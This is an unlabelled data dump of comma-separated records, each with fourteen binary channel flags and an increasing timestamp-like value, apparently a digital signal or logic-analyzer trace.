0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0559760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0560040e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0560280e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0560520e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0560760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0561000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0561240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0561520e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0561760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0562040e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0562280e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0562520e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0562760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0563000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0563240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0563520e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0563760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0564040e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0564280e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0564520e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0564760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0565000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0565240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0565520e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0565760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0566040e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0566280e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0566520e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0566760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0567000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0567240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0567520e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0567760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0568040e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0568280e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0568520e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0568760e-03 0,0,0,1,1,0,0,0,0,1,0,0,0,0,1.0568800e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.0568840e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.0569280e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.0569520e-03 0,0,0,1,1,1,0,0,0,0,0,0,0,0,1.0569560e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0569600e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0569800e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.0570040e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.0570280e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.0570520e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.0570760e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.0571000e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.0571240e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.0571520e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.0571760e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.0572040e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.0572280e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.0572520e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.0573000e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.0573240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0573320e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0573520e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0573760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0574040e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0574280e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0574520e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0574760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0575000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0575240e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0575520e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0575760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0576040e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0576280e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0576520e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0576760e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0577000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0577240e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.0577320e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.0577800e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.0578040e-03 0,0,0,1,1,1,0,0,0,0,0,0,0,0,1.0578080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0578120e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0578280e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0578520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0578760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0579000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0579240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0579520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0579760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0580040e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0580280e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0580520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0580760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0581000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0581240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0581520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0581760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0582040e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0582280e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0582520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0583000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0583240e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.0583320e-03 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.0583800e-03 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.0584040e-03 0,0,0,1,1,1,0,0,0,0,0,0,0,0,1.0584080e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0584120e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0584280e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0584520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0584760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0585000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0585240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0585520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0585760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0586040e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0586280e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0586520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0586760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0587000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0587240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0587520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0587760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0588000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0588240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0588480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0588760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0589000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0589240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0589480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0589720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0589960e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0590240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0590520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0590760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0591000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0591240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0591480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0591720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0592000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0592240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0592520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0592760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0593000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0593240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0593480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0593720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0594000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0594240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0594480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0594760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0595000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0595240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0595480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0595720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0595960e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0596240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0596520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0596760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0597000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0597240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0597480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0597720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0598000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0598240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0598520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0598760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0599000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0599240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0599480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0599720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0600000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0600240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0600480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0600760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0601000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0601240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0601480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0601720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0601960e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0602240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0602520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0602760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0603000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0603240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0603480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0603720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0604000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0604240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0604520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0604760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0605000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0605240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0605480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0605720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0606000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0606240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0606480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0606760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0607000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0607240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0607480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0607720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0607960e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0608240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0608520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0608760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0609000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0609240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0609480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0609720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0610000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0610240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0610520e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0610760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0611000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0611240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0611480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0611720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0612000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0612240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0612440e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0612760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0613000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0613240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0613480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0613720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0613960e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0614240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0614440e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0614760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0615000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0615240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0615480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0615720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0616000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0616240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0616440e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0616760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0617000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0617240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0617480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0617720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0618000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0618200e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0618440e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0618760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0619000e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0619240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0619480e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0619720e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0619960e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0620240e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0620440e-03 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.0620760e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.0621000e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.1869400e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.1871440e-03 1,0,0,1,1,0,0,0,0,0,0,1,0,1,1.1871600e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.1871920e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.1874840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.1875200e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.1875400e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.1875680e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.1875920e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.1876160e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.1876440e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.1876680e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.1876920e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.1877160e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.1877400e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.1877640e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1877720e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1877960e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1878200e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1878440e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1878680e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1878920e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1879160e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1879400e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1879640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1879920e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1880160e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1880440e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1880680e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1880920e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1881160e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1881400e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1881640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1881880e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1882120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1882400e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1882640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1882920e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1883160e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1883400e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1883640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1883880e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1884120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1884400e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1884640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1884920e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1885160e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1885400e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1885640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1885880e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1886120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1886400e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1886640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1886920e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1887160e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1887400e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1887640e-03 1,0,0,1,1,0,0,0,0,1,0,0,0,0,1.1887680e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.1887720e-03 1,0,0,1,1,1,0,0,0,1,0,0,1,0,1.1888160e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.1888400e-03 1,0,0,1,1,1,0,0,0,0,0,0,0,0,1.1888440e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1888480e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1888640e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1888920e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1889160e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1889400e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1889640e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1889920e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1890200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1890440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1890680e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1890920e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1891400e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1891680e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.1891720e-03 1,0,0,1,1,1,0,0,0,1,0,0,1,0,1.1891920e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.1892160e-03 1,0,0,1,1,1,0,0,0,0,0,0,0,0,1.1892240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1892280e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1892440e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1892680e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1892920e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1893160e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1893400e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1893640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1893920e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1894160e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1894440e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1894680e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1894920e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1895160e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1895400e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1895640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1895920e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1896160e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.1896200e-03 1,0,0,1,1,1,0,0,0,1,0,0,1,0,1.1896680e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.1896920e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1897000e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1897160e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1897400e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1897640e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1897920e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1898200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1898440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1898680e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1898920e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1899200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1899440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1899720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1899960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1900200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1900440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1900680e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1900920e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1901480e-03 1,0,0,1,1,0,0,0,0,1,0,0,0,0,1.1901720e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.1901760e-03 1,0,0,1,1,1,0,0,0,1,0,0,1,0,1.1901960e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.1902200e-03 1,0,0,1,1,1,0,0,0,1,0,0,1,0,1.1902680e-03 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.1902920e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1903000e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1903200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1903440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1903720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1903960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1904200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1904440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1904680e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1904920e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1905200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1905440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1905720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1905960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1906200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1906440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1906680e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1906920e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1907200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1907440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1907720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1907960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1908200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1908440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1908680e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1908920e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1909200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1909440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1909720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1909960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1910200e-03 